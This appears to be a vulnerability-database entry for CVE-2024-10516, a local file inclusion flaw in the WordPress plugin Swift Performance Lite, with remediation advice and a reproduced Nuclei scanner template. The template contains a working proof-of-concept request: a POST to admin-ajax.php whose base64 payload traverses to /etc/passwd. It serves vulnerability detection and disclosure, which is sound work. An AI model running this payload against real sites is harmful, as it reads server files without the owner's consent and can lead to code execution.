CVE-2024-10516: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion

日期: 2025-08-01 | 影响软件: Swift Performance Lite | POC: 已公开

漏洞描述

A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.

PoC代码[已公开]

id: CVE-2024-10516

info:
  name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
  impact: |
    Unauthenticated attackers can perform local PHP file inclusion via the ajaxify parameter to execute arbitrary code, potentially compromising the entire WordPress site.
  remediation: |
    Update Swift Performance Lite plugin to version 2.3.7.2 or later.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-10516
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10516
    cwe-id: CWE-98
    epss-score: 0.85038
    epss-percentile: 0.99318
    cpe: cpe:2.3:a:swiftperformance:swift_performance_lite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: swiftperformance
    product: swift_performance_lite
    fofa-query: body="/wp-content/plugins/swift-performance-lite"
  tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/swift-performance-lite"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ff38739a440161ed68ac527f91c1d62215c98ca64cba0631eee9ed8aab3e3c4f022100b6a125dfa11e390920adee045b2feecada91195d784b5b1968d7cc71bea57b32:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-10516.yaml

相关漏洞推荐